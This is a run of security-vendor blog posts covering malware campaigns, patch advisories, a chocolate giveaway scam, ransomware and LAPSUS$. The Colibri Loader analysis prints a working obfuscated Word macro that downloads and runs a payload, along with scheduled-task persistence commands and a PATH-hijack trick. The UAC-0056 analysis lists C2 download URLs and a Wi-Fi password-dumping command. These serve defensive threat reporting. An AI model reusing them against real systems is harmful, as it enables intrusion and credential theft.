IT NEWS

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

Campaign attack chain

The attack starts with a malicious Word document deploying Colibri bot that then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts a malicious macro. This attack is known as remote template injection.

The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:

Private Sub Document_Open()
zgotwed = "C:UsersPublicsetup.ex`e"
n87lcy4 = Replace("new:72Cs19e4ts4D", "s19e4ts", "2")
Set hu9v0dd = GetObject(n87lcy4 & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1"))
hu9v0dd.exec "cm" & "d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel .co/connection/setup.e`xe -Dest " & zgotwed & ";" & zgotwed
End Sub

Abusing PowerShell for Persistence

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for Windows 10 and above, while for lower versions it drops it in %DOCUMENTS%/WindowsPowerShell named as dllhost.exe

On Windows 7, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “C:UsersadminDocumentsWindowsPowerShelldllhost.exe“

On Windows 10 and above, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell.exe -windowstyle hidden“

In the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an odd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique employed by the malware author.

As mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so happens that Get-Variable is a valid PowerShell cmdlet (a cmdlet is a lightweight command used in the Windows PowerShell environment) which is used to retrieve the value of a variable in the current console.

Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

We reproduced this technique using the calculator to show how an adversary can easily achieve persistence combining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper location):

A search on VirusTotal for the file name Get-Variable.exe indicates that the first malicious file uploaded to the platform happened last August, which matches with the time that Colibri appeared on XSS underground forums. That sample has the same networking features as Colibri which helps us ascertain with more confidence that the technique was debuted by Colibri.

Conclusion

Colibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining popularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be known.

Malwarebytes users are protected against this attack thanks to our Anti-Exploit layer:

IOCs

Word Document

666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d

setup.exe (Colibri)

54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77

install.exe (Vidar)

b92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad

The post Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• New UAC-0056 activity: There’s a Go Elephant in the room
• Globant suffers network breach due to LAPSUS$ compromise
• Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited
• Hive ransomware impacts California non-profit health organisation
• MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks
• Phishers make a date with your calendar apps
• Tech support scam campaign targets Japanese visitors to PornHub
• URI spoofing flaw could phish WhatsApp, Signal, Instagram, and iMessage users
• Ukraine shuts down disinformation bot farm
• Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities
• “A little gift for you” SMS spam appears to come from your own phone number
• Watch out for LinkedIn fakes who want to get connected
• New spear phishing campaign targets Russian dissidents
• Attacks on Ukraine communications are a major part of the war
• Looking over your shoulder: when small mistakes have big consequences
• Satellites are critical infrastructure and need to be cybersecured
• Telling stories securely, with Runa Sandvik: Lock and Code S03E07
• Update now! Google releases emergency patch for Chrome zero-day used in the wild
• Tech support fraud is still very much alive, says latest FBI report

Stay safe!

The post A week in security (March 28 – April 3) appeared first on Malwarebytes Labs.

In a security advisory Zyxel has urged customers to update because a security flaw can lead to the circumvention of firewall protection in several Zyxel products.

Zyxel is a Taiwanese producer of modems and other networking equipment and its products are sold in over 150 countries.

The vulnerability

Zyxel says the vulnerability, listed as CVE-2022-0342, is an authentication bypass vulnerability caused by the lack of a proper access control mechanism, which has been found in the CGI program of some firewall versions. The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device.

The Common Gateway Interface (CGI) is an interface specification that enables web servers to execute an external program, typically to process user requests.

Affected series

Zyxel has published a list of vulnerable products that are within their warranty and support period, and has released updates to address the issue.

From the security advisory it is unclear whether there are vulnerable products that are outside of the support period.

How to fix the Zyxel vulnerability

Administrators of the NSG V1.20 through V1.33 Patch 4 need to reach out to their local Zyxel support team for the file, or wait until May when standard patch V1.33 Patch 5 is scheduled to be released.

Owners of the other affected products can search for their updated firmware by model number on the Zyxel support download page. Please note that the patches should have a release date of 03/29/2022 or later.

For firewalls it is always a good idea to restrict the IP addresses that are permitted to access the management interface.

Stay safe, everyone!

The post Update now! Zyxel patches critical firewall bypass vulnerability appeared first on Malwarebytes Labs.

Holidays inspire fraudsters and scammers to create timely and effective ways to string people along and get them to give up either their money or their personal information. This is the case in this chocolate-themed scam.

Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook.

Users of WhatsApp have reported receiving links to a web page where they can claim a “free Cadbury easter chocolate basket.”

When they open the link, users are presented with a short list of questions to answer—purportedly as part of an “Easter Egg Hunt”—before they are prompted to enter their personal details.

The Dorset Police Cyber Crime Unit posted an appeal about this scam to its Facebook page.

“DON’T CLICK THE LINK.” the post reads, the text bookended with the warning sign emoji. “Our Cyber Protect Officer has done it for you.”

The post continues with how the scam works:

“The site looks fairly convincing, however the only buttons that actually work are the ones to answer the questions. The search icon and the three little lines do nothing at all.

Once you answer those question [sic], you’re taken to a little game where you have to ‘find your prize’. Conveniently, your first and second tries won’t be successful, but you’ll ‘win’ on your third go! At that point, to claim your “prize”, you’ll be asked to hand over all sorts of personal information. That’s where the scam comes in!”

Looking at the shortened URL link (“tinyurl2.ru“) used in this campaign and how this scam campaign itself was formatted, it resembles the Amazon International Women’s Day 2022 Giveaway scam that is said to have gone viral in February.

It’s highly likely that scam links similar to these two can only be accessed via mobile devices.

This isn’t the first time Cadbury’s name has been dragged into a scam campaign. On December 2021, a Facebook scam about Cadbury reportedly giving away hampers of chocolate for Christmas did the rounds.

How to avoid falling for a scam like this

Warn your less security-savvy friends and family: When it comes to giveaways, think twice before clicking or sharing with friends, family, and social contacts. Scammers have always been on the prowl and do not rest until they get what they want. They are patient and have only got better at attempting to social engineer anyone who has a soft spot for anything—dogs, cats, commemorations, pizza, and, as we’ve just seen, chocolates.

Err on the side of caution. If you see a giveaway post in your feed, visit the official website of this brand to see if it’s genuine. Or, if they have a social media presence, which they usually do, ask on Twitter or Facebook. Send screenshots if you can.

It’s always a good idea to verify. But it’s not a good idea to click links thoughtlessly, and give your details away for delicious, delicious chocolate you can just buy from the shops.

Stay safe!

The post “Free easter chocolate basket” is a social media scam after your personal details appeared first on Malwarebytes Labs.

It is now officailly spring in the Northern Hemisphere, and with spring and the longer days comes the inescapable urge to shake off the lethargy of Winter and embrace the need to go through your stuff, throw a bunch of it out, and give the rest of it a shiny new lustre.

And in our increasingly digital lives, more and more of our stuff exists as bits and bytes on our phones, tablets, laptops and desktop computers. With the trees now full of blossom and the air prickling with pollen, the may feel an urge to straigten out your digital mess too.

If you do, we’ve got your back, and we humbly suggest that when you’re done tagging your dog in every photo and getting your folder names just so, you turn your attention to your device security and give that a little dust off as well. After all, nothing makes a bigger mess of your digital life than malware rummaging through it.

1. Say “yes” to software updates

Patching (downloading software updates) is like fixing the broken locks on the front doors of your digital life—the updates contain code that fixes weaknesses that thieves could otherwise jimmy open with their digital crowbars.

Start your spring clean by downloading all the software updates you’ve been putting off. Especially the big ones.

And yes, you’ve heard this advice before (we hope). Maybe you’ve heard it a hundred times, and maybe you’re heard it so often that you’re tired of hearing it and looking for some other advice. Well, fine, there’s some other advice below, but this is number one in our list for a reason, so please don’t skip it. This is the first and most important thing you can do to give your digtal security a spring boost.

2. Say “no” to duplicate passwords

How many online accounts do you have? Twenty, thirty, one hundred? And how many different passwords do you have for all those accounts? If the answer to these two questions isn’t exactly the same number—meaning that you have as many different passwords as you have different accounts—then you have some cleaning up to do.

Criminal hackers love it when you use the same password for more than one account. Once they’ve done the hard work of cracking one of your passwords they aren’t going to waste it, they’re going to try it on a laundry list of other websites to see what else it can unlock for them. It’s like a twofer at the grocery store for them: Hack one account, get one free!

The way to stop this is to create a unique password for each of your accounts, no exceptions. If you’re up for a deep clean then get yourself a password manager to make the job of creating and storing all those passwords easy. It’s a little more effort upfront, but well worth it.

3. Lose what you don’t use

We’re going to leave you to decide where you want to take this one and how far you want to go with it. We’ll just get you started with this simple line of thinking: From a security perspective, “more” is often worse. More apps means more places a hacker might find a broken lock or an open window they can use to break into your device. The same thing goes for your online accounts—each one is a potential way in to your digital life (particularly the accounts you haven’t used for a while, aren’t paying much attention to, or didn’t bother to lock down very well).

It’s amazing how many rarely-if-ever-used apps we accumulate on our devices, and how many accounts we open and then abandon online.

So why not lose some things? Ditch some apps you don’t need, clear out your unused browser add-ons, and delete some accounts you don’t use. The more you lose, the better.

4. Get on top of your email

Criminals use email to spread malware, fakes, and scams, so it is worth paying some attention to. Getting your unread email count to zero is immensely satisfying, and if you do it the right way it can give your security a spring in its step too.

Start by unsubscribing from all the mailing lists and newsletters you never read. You want the email that arrives in your inbox to be full of things that actually interest you, so it’s easier for you (and your spam filter) to spot anything that is slightly off. It’s just like step #3—lose what you don’t use.

Now go through your email and mark the things that look like scams, spams, malware, or junk as “Junk” or “Spam.” Every time you do that instead of just deleting shady emails you are actually training your email’s spam filter to work more effectively (if you want to know why, read our article on Bayesian Filtering). To work correctly your spam filter needs a few thousand up-to-date examples of both “good” emails and “bad” emails, so you want your inbox to be full of good things you care about, and your spam folder to be full of bad things that are malicious or spammy.

5. Run a malware scan

Spring cleaning is about the satisfaction of a job well done, and the peace of mind that comes with knowing your environment isn’t harbouring any nasties. To get that same sense of inner calm from your computer, put down the bleach and pick up a malware scanner.

A malware scanner is the quintessential deep clean for your device. It will pick over your files and apps, one by one, and run through them with a fine tooth comb, weeding out any malware that’s lurking in there undetected.

Now, we’re going to toot our own horn a little on this one. We try to give good, sensible, impartial advice on this blog, without somehow making everything about us and the things we make. Well it so happens that our scans are famous for their ability to pick up things that others miss, and it wouldn’t make any sense if we didn’t mention it when other people will happily tell you the same thing. So, if you want to scrub all the dark and difficult corners of your desktop or laptop computer, we honestly think the best advice we can give you is to run our anti-malware scanner. Sorry, not sorry.

The post 5 ways to spring clean your security appeared first on Malwarebytes Labs.

GitLab has issued several critical security updates, with users of the version control software urged to upgrade their installations as soon as possible. One of the fixes is for a hard coded password issue.

What is distributed version control?

Distributed version control is a way for an organisation’s codebase to be mirrored on the devices of anyone who needs access. Where people occasionally become confused is when they see a number of services using the word “Git” in their name. They’re not all the same thing, and we shouldn’t unnecessarily worry that one issue affects lots of different services due to naming conventions.

Are GitHub and GitLab the same thing?

They are not! If you’re reading about this update, you’re reading about an update for users of GitLab specifically. GitHub isn’t affected by this, and so users shouldn’t worry about missing security updates for hard-coded passwords. Hub and Lab are similar, but most definitely not the same.

What’s happened with GitLab?

There’s been a critical security release, addressing multiple issues. No fewer than 17 elements have been addressed, with one rated critical, two rated high, and nine rated medium. Here’s the rundown of the issue rated critical from their release page:

Static passwords inadvertently set during OmniAuth-based registration

A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This is a critical severity issue (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, 9.1). It is now mitigated in the latest release and is assigned CVE-2022-1162.

This vulnerability has been discovered internally by the GitLab team.

Note: We executed a reset of GitLab.com passwords for a selected set of users as of 15:38 UTC. Our investigation shows no indication that users or accounts have been compromised but we’re taking precautionary measures for our users’ security.

What are hardcoded passwords, and why are they bad?

Hardcoded passwords, also known as embedded credentials, make using the software or device they’re attached to a risky business. If your cheap, off the shelf router has the same single password in use for every single device, that’s bad. Someone who owns one of these devices now knows the password for all of those devices. If your forum software has a single, unchangeable password buried in the code, that’s bad. Somebody with dubious intentions may well have the keys to the kingdom for all versions of that forum.

It’s a similar story here – with a few caveats. According to The Register, accounts created through OmniAuth using fewer than 21 characters for the password were vulnerable to the default password. A script has also been released which, in GitLab’s words, “…can be used by self-managed instance admins to identify user accounts potentially impacted by CVE-2022-1162”.

Time to update

If you think you may be impacted by this, make haste and check out the list of updates. You don’t want to leave an easy way in for attackers to exploit your business.

The post GitLab issues security updates; watch out for hard coded passwords appeared first on Malwarebytes Labs.

This blog post was authored by Ankur Saini, Roberto Santos and Hossein Jazi.

UAC-0056 also known as SaintBear, UNC2589 and TA471 is a cyber espionage actor that has been active since early 2021 and has mainly targeted Ukraine and Georgia. The group is known to have performed a wiper attack in January 2022 on multiple Ukrainian government computers and websites.

Earlier in March, Cert-UA reported UAC-0056 activity that targeted state organizations in Ukraine using malicious implants called GrimPlant, GraphSteel as well as CobaltStrike Beacon. Following up with that campaign, SOCPRIME and SentinelOne have reported some similar activities associated with this actor.

In late March, the Malwarebytes Threat Intelligence Team identified new activity from this group that targeted several entities in Ukraine, including ICTV, a private TV channel. Unlike previous attacks that were trying to convince victims to open a url and download a first stage payload or distributing fake translation software, in this campaign the threat actor is using a spear phishing attack that contains macro-embedded Excel documents. In this blog post, we provide a technical analysis of this new campaign.

Attack process

The following picture shows the overall attack procedure used by this actor. The attack starts with malicious documents sent as attachment to a phishing email. The document contains a malicious macro that drops an embedded payload within the document. The next stage payloads are being downloaded from the attacker server in Base64 format.

Phishing email

The actor has distributed phishing emails at least from March 23th to March 28th. The email subject is Заборгованість по зарплаті (wage arrears) and the body of all the emails is the same:
Заборгованість по зарплаті. Оновлюється автоматично. Просимо надіслати вашу пропозицію для скорочення заборгованості по зарплаті. (Wage arrears. Updated automatically. Please send your offer to reduce your salary arrears.)

Excel document:

The attached document has the same name as email subject “Заборгованість по зарплаті” and it seems the actor has used a legit document as decoy.

This document contains an embedded macro that drops the first stage payload called “base-update.exe”. The payload has been saved in a “very hidden sheet” named “SheetForAttachedFile”. The sheet contains the filename, the date the payload is attached (21th March 2022), the file size and the content of the attached file in hex format.

The macro reads the content of the embedded file in the hidden sheet and writes it into the defined location for this payload which is the “AppDataLocalTemp” directory. The macro used by the actor is taken from a website that described and provided code for a method to attach and extract the files from an Excel workbook.

Elephant Dropper (Base-Update.exe)

Elephant Dropper is the initial executable deployed in this attack; as the name suggests this is a simple dropper which deploys further stages. This executable is written in the Go programming language and is signed with a stolen Microsoft certificate. The strings in the binary suggest that it was actually named as Elephant Dropper by the attackers themselves.

It checks if the “C:Users{user}.java-sdk” directory exists on the system and creates it if it does not. The strings in the binary are encoded and are only decoded when they are required to be used.
The dropper decodes the C2 address from a string and then downloads a Base64 encoded binary from the C2 and writes it to “C:Users{user}.java-sdkjava-sdk.exe”. This downloaded binary is named as Elephant Downloader by the attackers judging from the strings present. java-sdk.exe is then executed by the dropper with the following arguments, “-a 0CyCcrhI/6B5wKE8XLOd+w==”. The argument “-a” refers to address and the Base64 string is the C2 address in AES encrypted format.

Elephant Downloader (java-sdk.exe)

Elephant Downloader is also written in the Go Programming Language and is executed by the Dropper. The main purpose of this payload is to maintain persistence on the system and also deploy the next two stages of the attack. The strings in this executable are encoded in the same way as in the Dropper. It makes itself persistent through the auto-run registry key. To do so, it creates a registry key under “SoftwareMicrosoftWindowsCurrentVersionRun” named as “Java-SDK” with value “C:Users{user}Desktopjava-sdk.exe -a 0CyCcrhI/6B5wKE8XLOd+w==”.

The downloader is responsible for getting the implant and the client; the URL paths for the payloads are stored in encoded form in the binary. It downloads the implant and the client from http://194.31.98.124:443/m and http://194.31.98.124:443/p respectively in Base64 encoded format.

After this, it decodes the file names which are stored as well in encoded format and creates the file in the earlier mentioned directory .java-sdk. The file name of the implant is oracle-java.exe and the client is microsoft-cortana.exe. The downloader executes both payloads and passes “-addr 0CyCcrhI/6B5wKE8XLOd+w==” as arguments to both. Again the Base64 string is the C2 address in AES encrypted format.

Elephant Implant (oracle-java.exe)

Elephant Implant (also tracked as GrimPlant backdoor) seems to be one of the most important payloads in this attack. This executable communicates with the C2 on port 80. Similar to earlier payloads, strings are encoded in the same fashion is in this binary as well, and it also gets the C2 address encrypted from its parent process. The implant makes use of gRPC to communicate with the C2, it has a TLS certificate embedded in the binary and makes use of SSL/TLS integration in gRPC. This allows the malware to encrypt all the data that is being sent to the C2 via gRPC.

The implant uses the MachineID library to derive a unique id for each machine. It also gets the IP address of the machine by making a request to “https://api.ipify.org/”.
It also collects information related to the OS in a function named GetOSInfo, as part of this the malware collects the hostname, OS name and number of CPUs in the system. A function named GetUserInfo collects the Name, Username and path to Home directory of the current user.

The Implant can communicate with the C2 by using 4 types of RPC requests:

• /Implant/Login – This is the initial RPC request that is sent to the C2. Along with this RPC request the earlier retrieved ID and system information is sent to the C2 as well.
• /Implant/FetchCommand – This RPC request is used to retrieve the command that the actor wants to execute on the target machine. The retrieved command is executed via “%windir%SysWOW64WindowsPowerShellv1.0powershell.exe“. An AdminId and Command to be executed is received as a response to this command.
• /Implant/SendCmdOutput – This is used to send the output of an executed command by sending a
  SendCmdOutput RPC request to the C2. An AdminId and Command Output is sent with this request.
• /Implant/Heartbeat – A Heartbeat RPC request is made to C2 to send the status to the C2 at regular intervals. The machine id and system info retrieved earlier is sent with this request.

Elephant Client (microsoft-cortana.exe)

The last payload that will be described is this blog is the one named elephant_client by the actor (also tracked as GraphSteel backdoor). The functionality suggests that this final payload is a data stealer.
Similar to other payloads in this attack chain, this payload receives the C2 server as a parameter in Base64 format (0CyCcrhI/6B5wKE8XLOd+w==) which is AES encrypted format of the server. Decoding the Base64 string gives us the C2 IP address in AES encrypted format: d02c8272b848ffa079c0a13c5cb39dfb. The actor uses the following key to AES decrypt (ECB-NoPadding mode) the C2 address: F1D21960D8EB2FDDF2538D29A5FD50B5F64A3F9BF06F2A3C4C950438C9A7F78E.

Once the sample has established its connection with its C2 server, it starts collecting data and exfiltrating them into the server. At first it collects some basic info about the user and send it to the server as shown in Figure 12. (some info has been removed for privacy). The collected data is Base64 encoded, and includes hostname, OS name(windows), number of CPUs, IP address, Name, Username and home directory.

After that, the client tries to steal credentials from the victim’s machine. The actor steals data from the following services:

• Browser credentials
• WiFi information
• Credentials manager data
• Mail accounts
• Putty connections data
• Filezilla credentials

We have installed some of these services for testing purposes. Figure 13 shows how the stolen data is being sent to C2 server:

Base64 decoding data shows what data has been exfiltrated:

For example, to recover Wifi data, the command netsh wlan show profiles (that list all SSIDs saved in the machine) has been used. Once all the SSIDs are gathered, if any, it will launch the command netsh wlan show profile [SSID] key=clear, revealing all saved wifi passwords:

The following image shows an example of the command execution, where you can see some of the commands executed in the process:

Figure 17 shows another example of exfiltration in which an encoded PowerShell command is used to steal the data from the Secure Vault:

In addition to stealing credentials, the actor steals all the files from the victim’s machine. To collect the data it iterates through all the files in the user directory and hashes each of them. All of these collected hashes will be sent to the actor’s C2 server. Finally, the malware will send to the attackers all these files.
Note that all the collected data are AES encrypted before being sent to C2 server, so packet inspection will not reveal any useful information.

Conclusion

UAC-0056 aka UNC2589, TA471, or SaintBear is an active actor that has been performing cyber espionage campaigns against Ukraine since 2021. The group is known to have performed the WhisperGate disruptive attack against Ukraine government entities in early 2022. Recently we have observed new activity associated with this actor that used macro-embedded excel documents to drop its malicious software on victims machines. In this blog we provided a technical analysis of this campaign.

The Malwarebytes Threat Intelligence team continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.

IOCs

Emails:
1ce85d7be2e0717b79fbe0132e6851d81d0478dba563991b3404be9e58d745b1
58c93b729273ffa86ed7baa7f00ccd9664ab9b19727010a5a263066bff77cee8
ed0128095910fa2faa44e41f9623dc0ba26f00d84be178ef46c1ded003285ae3
Excel doc:
c1afb561cd5363ac5826ce7a72f0055b400b86bd7524da43474c94bc480d7eff
Elephant dropper (base-update.exe):
9e9fa8b3b0a59762b429853a36674608df1fa7d7f7140c8fccd7c1946070995a
Elephant downloader (java-sdk.exe):
8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1
Elephant Implant (oracle-java.exe):
99a2b79a4231806d4979aa017ff7e8b804d32bfe9dcc0958d403dfe06bdd0532
Elephant Client (microsoft-cortana.exe):
60bdfecd1de9cc674f4cd5dd42d8cb3ac478df058e1962f0f43885c14d69e816
C2:
194.31.98.124

The post New UAC-0056 activity: There’s a Go Elephant in the room appeared first on Malwarebytes Labs.

Ransomware authors are once again targeting health services, holding important files to ransom and impacting potentially vital services. On this occasion, the victims are a non-profit organisation assisting people with their healthcare needs in California.

When Hive ransomware strikes

The victim, Partnership HealthPlan of California, has apparently been struggling since at least March 24 with this outbreak of Hive ransomware. Hive ransomware has been around since June 2021, and is a typical targeted ransomware-as-a-service (RaaS). It leverages threats to publish exfiltrated data to pressure victims to pay up. The ransomware group is known to work with affiliates that use various methods to compromise company networks.

Last August, the FBI published a paper detailing indicators of Hive compromise, along with additional tactics and techniques used by the ransomware operators. It is not a threat to be taken lightly.

The impact of ransomware

The website for the embattled provider currently reads as follows:

Partnership HealthPlan of California recently became aware of anomalous activity on certain computer systems within its network. We are working diligently with third-party forensic specialists to investigate this disruption, safely restore full functionality to affected systems, and determine whether any information may have been potentially accessible as a result of the situation. Should our investigation determine that any information was potentially accessible, we will notify affected parties according to regulatory guidelines. We appreciate your patience and understanding and apologize for any inconvenience.

They go on to list what to do if you’re a partnership member or provider, along with the warning not to send any PII via email. As noted on VentureBeat, setting up alternate methods of contact (in this case, Gmail addresses) is a smart move in case their regular email comms are also compromised.

A slice of data exfiltration to round things off

Any impact on medical services can be extremely serious. Anything from routine appointments and check-ups to delayed operations or medical assistance can be the end result. The affected organisation in this case serves upwards of 600,000 people in the California region.

Additionally, the ransomware operators claim to have stolen 400GB of files. This allegedly includes 850k PII records which includes names, addresses, and social security numbers. This is less than ideal, though investigations are still ongoing. The primary concern right now has to be that services are restored to full functionality. The human impact of healthcare attacks is significant, and the kind of additional worry that people using said services don’t need to be dealing with.

This story is still developing, and we’ll add any important information to the blog as it comes to light. If you think you may be affected by this incident, you should contact the affected organisation using the contact details they’ve provided as soon as you can.

The post Hive ransomware impacts California non-profit health organisation appeared first on Malwarebytes Labs.

Apple has released security updates for macOS Monterey 12.3.1, iOS 15.4.1, iPadOS 15.4.1, tvOS 15.4.1, and watchOS 8.5.1. The update patches two vulnerabilities about which the advisory states that Apple is aware of a report that this issue may have been actively exploited for both vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the vulnerabities that were patched in the updates:

• CVE-2022-22674
• CVE-2022-22675

Intel Graphics Driver

The vulnerability listed as CVE-2022-22674 exists in the Intel Graphics Driver and is described as an out-of-bounds read issue that may lead to the disclosure of kernel memory and that was addressed with improved input validation. Impacted devices are Macs running macOS Monterey. The graphics drivers are built into the Mac operating system.

AppleAVD

The vulnerability listed as CVE-2022-22675 exists in the AppleAVD audio and video decoding component and is described as an out-of-bounds write issue that was addressed with improved bounds checking. Impacted devices include:

• Macs running macOS Monterey
• iPhone 6s and later
• iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Out-of-bounds read

If a flaw in a program allows it to read or write outside of the bounds set for the program, it is possible to manipulate other parts of the memory which are allocated to more critical functions. This can allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Specific details about the vulnerabilities have not been disclosed which is habitual, since Apple wants to give as many users as possible a chance to update before giving others a chance to abuse them.

Stay safe, everyone!

The post Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited appeared first on Malwarebytes Labs.

Globant, an IT and software development firm with offices all around the globe, recently admitted in a press statement Wednesday that it has suffered a breach in their network. Affected data includes (but may not be limited to) some source code and certain project documentations of clients.

“We have recently detected that a limited section of our company’s code repository has been subject to unauthorized access. We have activated our security protocols and are conducting an exhaustive investigation,” company officials wrote. “To date, we have not found any evidence that other areas of our infrastructure systems or those of our clients were affected. We are taking strict measures to prevent further incidents.”

The breach allegedly represents the latest work from the increasingly popular threat actor group LAPSUS$, which claimed responsibility for the attack this week. In a message sent on Telegram to 45,000 followers, individuals who claim to be behind LAPSUS$ first announced that they were “officially back from vacation.”

A follow-up message sent shortly after reads:

For anyone who is interersted about the poor security practices in use at Globant.com. I will expose the admin credentials for ALL their devops platforms below.

As of this writing, Globant never confirmed when they were breached nor did they mention if a group has already approached them for ransom.

More about LAPSUS$

Globant is the latest company in a lengthening list of huge names compromised by LAPSUS$, a relatively new group in the online extortion gig. This list already includes Microsoft, Nvidia, Samsung, LG, and Okta.

If you’re wondering if LAPSUS$ has always targeted such large companies, the answer is yes. When LAPSUS first grabbed the attention of the cybersecurity community, they had already compromised companies like Impresa, the largest media conglomerate in Brazil; Claro, one of Brazil’s telecommunications operators; and Brazil’s Ministry of Health.

These early attacks have led people to believe that LAPSUS$ hailed from South America. Notably, their use of Spanish and Portuguese was akin to native speakers. Microsoft tracks the group as “DEV-0537”.

As a criminal group, their primary focus is to hack companies, steal their data, and demand a ransom. In some cases, they have used ransomware and phishing (among other social engineering tactics) as a precursor to get inside target systems. LAPSUS$ is known for not only stealing data but also for stealing code from companies they target. It is said that they use stolen code to better hide their malware. To date, they have reportedly pilfered a total of $14 million (£10.6 million)

Before revealing that the group breached Globant and stole the company’s data, LAPSUS$ claimed that some of their members were taking “a vacation”. In cybersecurity, we have learned that this could either mean that threat actors are moving away from the spotlight to lay low—because of the pressure to evade law enforcement—or the actors have somehow already been captured. It appears that the latter applies in LAPSUS$’s case.

In late March, cybersecurity researchers investigating these big-named hacks were able to trace the attacks to a 16-year old teenager in Oxford, England. The teen, who remains unnamed due to his age, goes by the online monikers “White” and “Breachbase” and is believed to be the group’s mastermind. It is said that the Oxford teen hacker’s personal information, including those of his parents, was leaked by rival hackers. On top of that, forensic investigators used evidence from the hacks and public information to tie the teen to the hacking group.

Another suspected LAPSUS$ member is also a teenager but based in Brazil. According to Bloomberg, this teen is “so skilled at hacking—and so fast—that researchers initially thought the activity they were observing was automated.”

Investigators looking into the hacks have found a total of seven unique accounts associated with the extortion group. This indicates that there are likely more members of LAPSUS$ that are involved.

On March 21, the FBI launched a public appeal for information about the group. Four days later, news of the UK police arresting seven teenagers between the ages of 16 and 21 broke. It was part of an international police investigation into the LAPSUS$ gang. Today, according to the BBC, two of the teens (aged 16 and 17) have been formally charged with “three counts of unauthorised access to a computer with intent to impair the reliability of data, one count of fraud by false representation, and one count of unauthorised access to a computer with intent to hinder access to data.”

The 16-year-old, whom we believe could be the teen from Oxford, is also charged with “one count of causing a computer to perform a function to secure unauthorised access to a program.”

The post Globant suffers network breach due to LAPSUS$ compromise appeared first on Malwarebytes Labs.